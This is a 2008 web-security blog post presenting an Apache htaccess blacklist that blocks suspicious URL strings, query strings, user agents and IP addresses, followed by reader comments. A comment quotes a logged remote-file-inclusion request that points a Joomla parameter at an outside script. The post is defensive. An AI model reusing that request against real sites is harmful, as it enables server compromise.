Fall Sale! Code FALL2024 takes 25% OFF our Pro Plugins & Books »
Web Dev + WordPress + Security

Perishable Press 3G Blacklist

[ 3G Stormtroopers ]

After much research and discussion, I have developed a concise, lightweight security strategy for Apache-powered websites. Prior to the development of this strategy, I relied on several extensive blacklists to protect my sites against malicious user agents and IP addresses.

Over time, these mega-lists became unmanageable and ineffective. As increasing numbers of attacks hit my server, I began developing new techniques for defending against external threats. This work soon culminated in the release of a “next-generation” blacklist that works by targeting common elements of decentralized server attacks.

Consisting of a mere 37 lines, this “2G” Blacklist provided enough protection to enable me to completely eliminate over 350 blacklisting directives from my site’s root htaccess file. This improvement increased site performance and decreased attack rates, however many bad hits were still getting through. More work was needed..

The 3G Blacklist

Work on the 3G Blacklist required several weeks of research, testing, and analysis. During the development process, five major improvements were discovered, documented, and implemented. Using pattern recognition, access immunization, and multiple layers of protection, the 3G Blacklist serves as an extremely effective security strategy for preventing a vast majority of common exploits. The list consists of four distinct parts, providing multiple layers of protection while synergizing into a comprehensive defense mechanism. Further, as discussed in previous articles, the 3G Blacklist is designed to be as lightweight and flexible as possible, thereby facilitating periodic cultivation and maintenance. Sound good? Here it is:

# PERISHABLE PRESS 3G BLACKLIST

# PART I: CHARACTER STRINGS
<IfModule mod_alias.c>
 RedirectMatch 403 \:
 RedirectMatch 403 \;
 RedirectMatch 403 \<
 RedirectMatch 403 \>
 RedirectMatch 403 \/\,
 RedirectMatch 403 \/\/
 RedirectMatch 403 f\-\.
 RedirectMatch 403 \.\.\.
 RedirectMatch 403 \.inc
 RedirectMatch 403 alt\=
 RedirectMatch 403 ftp\:
 RedirectMatch 403 ttp\:
 RedirectMatch 403 \.\$url
 RedirectMatch 403 \/\$url
 RedirectMatch 403 \/\$link
 RedirectMatch 403 news\.php
 RedirectMatch 403 menu\.php
 RedirectMatch 403 main\.php
 RedirectMatch 403 home\.php
 RedirectMatch 403 view\.php
 RedirectMatch 403 about\.php
 RedirectMatch 403 blank\.php
 RedirectMatch 403 block\.php
 RedirectMatch 403 order\.php
 RedirectMatch 403 search\.php
 RedirectMatch 403 errors\.php
 RedirectMatch 403 button\.php
 RedirectMatch 403 middle\.php
 RedirectMatch 403 threads\.php
 RedirectMatch 403 contact\.php
 RedirectMatch 403 include\.php
 RedirectMatch 403 display\.php
 RedirectMatch 403 register\.php
 RedirectMatch 403 authorize\.php
 RedirectMatch 403 \/wp\-signup\.php
 RedirectMatch 403 \/classes\/
 RedirectMatch 403 \/includes\/
 RedirectMatch 403 \/path\_to\_script\/
 RedirectMatch 403 ImpEvData\.
 RedirectMatch 403 head\_auth\.
 RedirectMatch 403 db\_connect\.
 RedirectMatch 403 check\_proxy\.
 RedirectMatch 403 doeditconfig\.
 RedirectMatch 403 submit\_links\.
 RedirectMatch 403 change\_action\.
 RedirectMatch 403 send\_reminders\.
 RedirectMatch 403 comment\-template\.
 RedirectMatch 403 syntax\_highlight\.
 RedirectMatch 403 admin\_db\_utilities\.
 RedirectMatch 403 admin\.webring\.docs\.
 RedirectMatch 403 function\.main
 RedirectMatch 403 function\.mkdir
 RedirectMatch 403 function\.opendir
 RedirectMatch 403 function\.require
 RedirectMatch 403 function\.array\-rand
 RedirectMatch 403 ref\.outcontrol
</IfModule>

# PART II: QUERY STRINGS 
<ifmodule mod_rewrite.c>
 RewriteCond %{QUERY_STRING} ftp\:   [NC,OR]
 RewriteCond %{QUERY_STRING} http\:  [NC,OR]
 RewriteCond %{QUERY_STRING} https\: [NC,OR]
 RewriteCond %{QUERY_STRING} \[      [NC,OR]
 RewriteCond %{QUERY_STRING} \]      [NC]
 RewriteRule .* -                    [F,L]
</ifmodule>

# PART III: USER AGENTS
SetEnvIfNoCase User-Agent "Jakarta Commons" keep_out
SetEnvIfNoCase User-Agent "Y!OASIS/TEST"    keep_out
SetEnvIfNoCase User-Agent "libwww-perl"     keep_out
SetEnvIfNoCase User-Agent "MOT-MPx220"      keep_out
SetEnvIfNoCase User-Agent "MJ12bot"         keep_out
SetEnvIfNoCase User-Agent "Nutch"           keep_out
SetEnvIfNoCase User-Agent "cr4nk"           keep_out
<Limit GET POST PUT>
 order allow,deny
 allow from all
 deny from env=keep_out
</Limit>

# PART IV: IP ADDRESSES
<Limit GET POST PUT>
 order allow,deny
 allow from all
 deny from 75.126.85.215  "# blacklist candidate 2008-01-02 = admin-ajax.php attack "
 deny from 128.111.48.138 "# blacklist candidate 2008-02-10 = cryptic character strings "
 deny from 87.248.163.54  "# blacklist candidate 2008-03-09 = block administrative attacks "
 deny from 84.122.143.99  "# blacklist candidate 2008-04-27 = block clam store loser "
</Limit>

Installation and Usage

Before using the 3G Blacklist, check the following system requirements:

  • Linux server running Apache
  • Enabled Apache module: mod_alias
  • Enabled Apache module: mod_rewrite
  • Ability to edit your site’s root htaccess file (or)
  • Ability to modify Apache’s server configuration file

With these requirements met, copy and paste the entire 3G Blacklist into either the root htaccess file or the server configuration file. After uploading, visit your site and check proper loading of as many different types of pages as possible. For example, if you are running a blogging platform (such as WordPress), test different page views (single, archive, category, home, etc.), log into and surf the admin pages (plugins, themes, options, posts, etc.), and also check peripheral elements such as individual images, available downloads, and alternate protocols (FTP, HTTPS, etc.).

While the 3G Blacklist is designed to target only the bad guys, the regular expressions used in the list may interfere with legitimate URL access. If this happens, the browsing device will display a 403 Forbidden error. Don’t panic! Simply check the blocked URL, locate the matching blacklist string, and disable the directive by placing a pound sign ( # ) at the beginning of the associated line. Once the correct line is commented out, the blocked URL should load normally. Also, if you do happen to experience any conflicts involving the 3G Blacklist, please leave a comment or contact me directly. Thank you :)

Wrap Up..

As my readers know, I am serious about site security. Nothing gets my adrenaline pumping more than the thought of a giant meat grinder squirting out endless chunks of mangled cracker meat. Spam and other exploitative activity on the web has grown exponentially. Targeting and blocking individual agents and IP is no longer a viable strategy. By recognizing and immunizing against the broadest array of common attack elements, the 3G Blacklist maximizes resources while providing solid defense against malicious attacks.

Updates

Updates to the 3G Blacklist/firewall:

2008/05/14

Removed “RedirectMatch 403 \/scripts\/” from the first part of the blacklist due to conflict with Mint Statistics.

2008/05/18

Removed the following three directives to facilitate Joomla functionality:

RedirectMatch 403 \/modules\/
RedirectMatch 403 \/components\/
RedirectMatch 403 \/administrator\/

2008/05/31

Removed “RedirectMatch 403 config\.php” from the first part of the list to ensure proper functionality with the “visual-editing” feature of the WordPress Admin Area.

About the Author
Jeff Starr = Fullstack Developer. Book Author. Teacher. Human Being.
SAC Pro: Unlimited chats.

84 responses to “Perishable Press 3G Blacklist”

  1. Hehe, I make a really bad reader… I even can’t cheerlead :p

    By the way, thank you for the link, I was an interesting read. I edited my .htaccess and it’s working fine for me too.

    As I had my nose on Apache code, I changed the way I handle gzip content on my server. I used to have a somehow tricky strategy involving 3 .htaccess files et co; now I centralize everything in the root .htaccess – as it should be – and I find the code to be way better.

    Here it is:

    # SEND GZIPPED CONTENT TO COMPATIBLE BROWSERS
    AddEncoding x-gzip .gz
    AddType "text/css;charset=utf-8" .css
    AddType "text/javascript;charset=utf-8" .js
    RewriteCond %{HTTP:Accept-encoding} gzip
    #RewriteCond %{HTTP_USER_AGENT} !Safari
    RewriteCond %{REQUEST_FILENAME}.gz -f
    RewriteRule ^(.*)$ $1.gz [QSA,L]

  2. Perishable 2008/06/14 8:35 am

    Glad to hear that the Blacklist is once again working fine for you. That particular rule blocks many ill requests. It is good to have it!

    Interesting that you mention centralizing htaccess rules. I have been working on the very same thing. I am in the process of consolidating everything in the public web root, such that individual domains will require much less fiddling. Definitely way better ;)

    Thanks also for the sweet htaccess code — looks juicy! I have seen similar directives floating around the Web, but have yet to experiment with them. As you may know, my host (ASO) recently disabled gzip compression on all servers. I am still able to deliver compressed (X)HTML content, but CSS and JavaScript are currently sent uncompressed.

  3. (a) Yes, it’s my favorite rule indeed, if you remember :p

    (b) Managing Apache behavior should always be done in one configuration file (aka .htacces) only. As you say, it’s way easier.

    (c) It is juicy, believe me. I’m using it on my main website for the moment, and boy I wish I had known it before !

    It filters the browsers and serve compatible ones the .gz version of static files, and that, all over your website. That means for example, that you can gzip WordPress admin JS & CSS files, and appreciate a tremendous boost on admin pages loading delays !

    With files like prototype.js or jquery.js being used by WordPress, and weighting around 100kb, being served a 70% lighter .gz alternative is really cool.

  4. That’s the whole idea. It only applies to file you know won’t change. You compress them manually once, then serve these .gz files to the visitors.

    On-the-fly compression has its great advantages, but for static content, it’s a waste of CPU.

    I wrote a full post on this on my blog, but I fear Google’s translation won’t be as appealing as my natural writing style.

    Once again, langage is a true barrier :/

  5. Definitely sweet, but does that mean you are responsible for manually creating and maintaining the individual zip files?

  6. Is the 3G Blacklist supposed to replace the 2G Blacklist or can you put them both together?

  7. Perishable 2008/07/26 4:03 pm

    Hi Tom, the 3G Blacklist is meant to replace the 2G in its entirety. Running both together would be overkill..

  8. Very nice work!! I put this script in place and have notice a significant reduction in the log files.
    How would you modify this script to deny all user agents (while keeping in place an allow all IP with deny on specific IPs)? In other words, I would like to allow IP (with specific IP denials) and disallow all user agents? I’ve got a pesky problem with user agents (legit names) trying to access an exploit which no longer exists on our site. see below..

    f2.d.5446.static.theplanet.com - - [06/Aug/2008:01:00:51 +0000] "GET
    /portal/components/com_extcalendar/extcalendar.php?
    mosConfig_absolute_path=http://www.shakershoppe.com/_files/x.txt??M
    HTTP/1.1" 403 259

    3G is doing a nice job of issuing 403s but I’m ready to turn off all user agents.

    Keep up the GREAT WORK!!!

  9. Hi James, glad to hear the blacklist is working for you :) As far as disallowing all user agents while allowing specific IPs, either I am not understanding you correctly or I am confused as to how that might work. It seems that blocking all user agents would essentially block all traffic/visitors, correct? Otherwise, the rules used to block all user agents would conflict with any list of allowed IP addresses. What am I missing here?
    Regards,
    Jeff

  10. Jeff thanks very much for the quick reply and sorry about the confusion. After spending some time on the apache site, i came to the conclusion that blocking user agents (via deny) would also impact the default of deny for IPs. In otherwords apache seems to only allow one default for the typically allow, then deny

    In essence blocking all user agents would essentially block all traffic/visitors. I would like to essentially deny all bots/crawlers but allow users. Is there away to do this (instead of specifying user agents to keep out – like in your PART III: USER AGENTS)?

    Thanks,
    James

  11. Jeff Starr 2008/08/06 5:34 pm

    Hi James, in my experience, blocking specific user agents is a moderately futile endeavor. The reason for this is that user agents are constantly changing and easily faked. Keeping an effective blacklist of user agents requires a fair amount of diligence, researching new agents, new fakes, and then checking and updating the blacklist and so on. This is precisely one of the reasons why I developed the 3G blacklist. The 3G takes a different approach by blocking the various character strings used in attacks, thereby eliminating the need for regular maintenance and, ultimately, monstrous lists of banned agents. Nonetheless, I have compiled an excellent blacklist of undesirable user agents, bad bots, scrapers, and other scumbags. It is extensive in its scope, yet not so exhaustive as to negatively affect server performance. The compressed version of the list is available here.
    Regards,
    Jeff

  12. Hey Jeff,

    I fired the 3G blacklist into the .htaccess file in my server’s root and things have gone haywire!

    I’ve replaced it with the original file my I’m still getting sitewide Internal Server Errors.

    If you have any ideas on what I might’ve done, I’d truly appreciate hearing them,

    Cheers,

Comments are closed for this post. Something to add? Let me know.
Welcome
Perishable Press is operated by Jeff Starr, a professional web developer and book author with two decades of experience. Here you will find posts about web development, WordPress, security, and more »
Blackhole Pro: Trap bad bots in a virtual black hole.
Thoughts
I disabled AI in Google search results. It was making me lazy.
Went out walking today and soaked up some sunshine. It felt good.
I have an original box/packaging for 2010 iMac if anyone wants it free let me know.
Always ask AI to cite its sources. Also: “The Web” is not a valid answer.
All free plugins updated and ready for WP 6.6 dropping next week. Pro plugin updates in the works also complete :)
99% of video thumbnail/previews are pure cringe. Goofy faces = Clickbait.
RIP ICQ
Newsletter
Get news, updates, deals & tips via email.
Email kept private. Easy unsubscribe anytime.